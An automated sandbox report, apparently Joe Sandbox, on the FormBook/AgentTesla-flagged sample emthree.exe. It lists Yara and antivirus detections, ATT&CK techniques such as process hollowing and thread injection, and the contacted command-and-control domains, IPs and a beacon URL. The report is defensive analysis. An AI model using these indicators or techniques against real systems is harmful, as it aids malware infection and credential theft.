          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1DLL Side-Loading1Process Injection512Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Masquerading1Input Capture1Virtualization/Sandbox Evasion3Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing13/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Timestomp1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronDLL Side-Loading1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 323574 Sample: emthree.exe Startdate: 27/11/2020 Architecture: WINDOWS Score: 100 36 Malicious sample detected (through community Yara rule) 2->36 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 7 other signatures 2->42 10 emthree.exe 3 2->10         started        process3 file4 28 C:\Users\user\AppData\...\emthree.exe.log, ASCII 10->28 dropped 52 Tries to detect virtualization through RDTSC time measurements 10->52 14 emthree.exe 10->14         started        signatures5 process6 signatures7 54 Modifies the context of a thread in another process (thread injection) 14->54 56 Maps a DLL or memory area into another process 14->56 58 Sample uses process hollowing technique 14->58 60 Queues an APC in another process (thread injection) 14->60 17 explorer.exe 14->17 injected process8 dnsIp9 30 porncamslivechat.com 184.154.50.243, 49746, 80 SINGLEHOP-LLCUS United States 17->30 32 www.amarilloautoexpress.com 23.27.109.19, 49747, 80 EGIHOSTINGUS United States 17->32 34 4 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 rundll32.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          emthree.exe41%MetadefenderBrowse
          emthree.exe65%ReversingLabsWin32.Trojan.AgentTesla
          emthree.exe100%AviraTR/Kryptik.zirmt
          emthree.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.emthree.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.fontbureau.comu0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.porncamslivechat.com/unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.amarilloautoexpress.com
          		23.27.109.19
          		truetrue
            		unknown
            porncamslivechat.com
            		184.154.50.243
            		truetrue
              		unknown
              www.porncamslivechat.com
              		unknown
              		unknowntrue
                		unknown
                www.asojebu.com
                		unknown
                		unknowntrue
                  		unknown
                  www.haircuressteampod.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.porncamslivechat.com/unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0qtrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.apache.org/licenses/LICENSE-2.0emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                      		high
